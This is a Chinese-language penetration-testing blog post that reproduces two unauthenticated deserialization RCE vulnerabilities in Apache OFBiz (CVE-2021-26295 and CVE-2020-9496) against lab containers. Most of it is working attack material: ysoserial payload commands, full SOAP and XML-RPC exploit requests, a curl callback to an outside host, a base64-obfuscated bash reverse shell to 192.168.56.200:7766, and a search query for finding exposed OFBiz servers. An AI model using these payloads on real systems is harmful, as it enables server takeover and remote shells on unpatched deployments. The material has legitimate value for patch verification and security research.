首页 » NetworkSec » Penetration » 正文

apache ofbiz 两个反序列化漏洞重现(CVE-2021-26295和CVE-2020-9496)

0x00 概述

OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI,是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。

CVE-2021-26295:RMI反序列化命令执行,未经身份验证的攻击者可以成功接管Apache OFBiz。

CVE-2020-9496:xmlrpc未授权反序列化导致RCE。

 

0x01 影响范围

CVE-2021-26295:Apache OFBiz < 17.12.06

CVE-2020-9496:Apache OFBiz < 17.12.04

 

0x02 漏洞重现

app=”Apache_OFBiz”

CVE-2021-26295

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>ace......e78</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="http://xxxxxx.dnslog.cn"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>

中间的cus-obj 直接用:

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out

然后转成hex 即可:

import binascii
filename = 'ofbizhex.out'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content))

 

RCE

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘curl http://192.168.56.200:7766/testofbizrce’ > b2h10.txt

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key> <cus-obj>aced00057......00678</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

 

 

反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}’ > b2h11.txt

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key> <cus-obj>aced00057......000678</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

 

CVE-2020-9496

环境:https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/

https://192.168.56.200:8443/myportal/control/main

https://192.168.56.200:8443/webtools/control/xmlrpc

 

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 “touch /tmp/success” | base64 | tr -d “\n”

 

POST /webtools/control/xmlrpc HTTP/1.1
......
Content-Type: application/xml
 
<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0......A14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

 

 

Comment

please input captcha *